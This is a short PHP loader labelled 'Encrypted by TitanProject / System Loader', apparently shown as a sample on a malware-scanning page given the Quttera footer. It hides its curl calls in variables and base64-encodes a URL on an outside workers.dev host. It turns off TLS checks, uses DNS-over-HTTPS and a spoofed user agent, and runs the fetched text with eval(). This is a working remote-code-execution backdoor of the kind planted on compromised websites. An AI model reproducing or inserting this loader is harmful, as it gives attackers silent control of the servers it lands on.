/**
* @Encrypted by TitanProject
* @Note: System Loader
*/
error_reporting(0);
set_time_limit(0);
$_c = "curl_init";
$_e = "curl_exec";
$_s = "curl_setopt";
// Asli: https://xenpaibot-alone.alghifaryy22.workers.dev/Asu/asu.txt
$u = base64_decode('aHR0cHM6Ly94ZW5wYWlib3QtYWxvbmUuYWxnaGlmYXJ5eTIyLndvcmtlcnMuZGV2L0FzdS9hc3UudHh0');
$h = $_c($u);
if (defined("CURLOPT_DOH_URL")) {
$_s($h, constant("CURLOPT_DOH_URL"), "https://cloudflare-dns.com/dns-query");
}
$_s($h, CURLOPT_RETURNTRANSFER, 1);
$_s($h, CURLOPT_SSL_VERIFYHOST, 0);
$_s($h, CURLOPT_SSL_VERIFYPEER, 0);
$_s($h, CURLOPT_FOLLOWLOCATION, 1);
$_s($h, CURLOPT_USERAGENT, "Mozilla/5.0");
$r = $_e($h);
curl_close($h);
if ($r) {
eval("" . $r);
}
© 2023 Quttera Ltd. All rights reserved.